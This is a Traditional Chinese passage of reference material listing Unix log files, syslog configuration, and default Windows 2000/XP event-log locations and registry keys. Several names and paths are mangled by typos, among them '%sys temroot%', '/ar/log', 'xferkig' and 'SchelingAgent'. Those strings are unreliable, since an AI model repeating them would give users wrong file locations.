在這些目錄下,或其子目錄下,你可以找到以下日誌文件(也許是其中的一部分): lastlog 記錄用戶最後一次成功登錄時間 loginlog 不良的登陸嘗試記錄 messages 記錄輸出到系統主控台以及由syslog系統服務程序產生的消息 utmp 記錄當前登錄的每個用戶 utmpx 擴展的utmp wtmp 記錄每一次用戶登錄和注銷的歷史信息 wtmpx 擴展的wtmp vold.log 記錄使用外部介質出現的錯誤 xferkig 記錄Ftp的存取情況 sulog 記錄su命令的使用情況 acct 記錄每個用戶使用過的命令 aculog 撥出自動呼叫記錄 記錄輸出到系統主控台以及由syslog系統服務程序產生的消息。syslog採用可配置的、統一的系統登記程序,隨時從系統各處接受log請求,然後根據/etc/syslog.conf中的預先設定把log信息寫入相應文件中、郵寄給特定用戶或者直接以消息的方式發往控制台。值得注意的是,為了防止入侵者修改、刪除messages里的記錄信息,可以採用用列印機記錄或跨越網路登記的方式來挫敗入侵者的企圖。任何程序都可以通過syslog記錄事件。Syslog可以記錄系統事件,可以寫到一個文件或設備中,或給用戶發送一個信息。它能記錄本地事件或通過網路記錄到另一台主機上的事件。 Syslog依據兩個重要的文件:/sbin/syslogd(守護進程)和/etc/syslog.conf配置文件。習慣上,多數syslog信息被寫到/var/adm或/ar/log目錄下的信息文件中(*message.)。一個典型的syslog記錄包括生成程序的名字和一個文本信息,它還包括一個設備和一個行為級別(但不在日誌中出現)。 Windows系統日誌以Windows2000/XP為例,日誌文件通常有應用程序日誌,安全日誌、系統日誌、DNS伺服器日誌、FTP日誌、WWW日誌等等。 日誌文件默認位置: 應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%sys temroot%\sys tem32\config,默認文件大小512KB,管理員都會改變這個默認大小。 安全日誌文件:%sys temroot%\sys tem32\config\SecEvent.EVT 系統日誌文件:%sys temroot%\sys tem32\config\SysEvent.EVT 應用程序日誌:%sys temroot%\sys tem32\config\AppEvent.EVT Internet信息服務FTP日誌默認位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\ 默認每天一個日誌 Internet信息服務WWW日誌默認位置:%sys temroot%\sys tem32\logfiles\w3svc1\ 默認每天一個日誌 Scheler服務日誌默認位置:%sys temroot%\schedlgu.txt 以上日誌在注冊表裡的鍵: 應用程序日誌,安全日誌,系統日誌,DNS伺服器日誌,它們這些LOG文件在注冊表中的位置: HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog 有的管理員很可能將這些日誌重定位。其中EVENTLOG下面有很多的子表,裡面可查到以上日誌的定位目錄。 Schedluler服務日誌在注冊表中的位置: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent Windows NT/2000主要有以下三類日成記錄系統事件: (1)應用程序日誌記錄由應用程序產生的事件。例如,某個資料庫程序可能設定為每次成功完成備份操作後都向應用程序日誌發送事件記錄信息。應用程序日誌中記錄的時間類型由應用程序的開發者決定,並提供相應的系統工具幫助用戶使用應用程序日誌。 (2)系統日誌記錄由Windows NT/2000操作系統組件產生的事件,主要包括驅動程序、系統組件和應用軟體的崩潰以及數據丟失錯誤等。系統日誌中記錄的時間類型由Windows NT/2000操作系統預先定義。 (3)安全日誌記錄與安全相關事件,包括成功和不成功的登錄或退出、系統資源使用事件等。與系統日誌和應用程序日誌不同,安全日誌只有系統管理員才可以訪問。 Windows NT/2000的系統日誌由事件記錄組成。每個事件記錄為三個功能區:記錄頭區、事件描述區和附加數據區。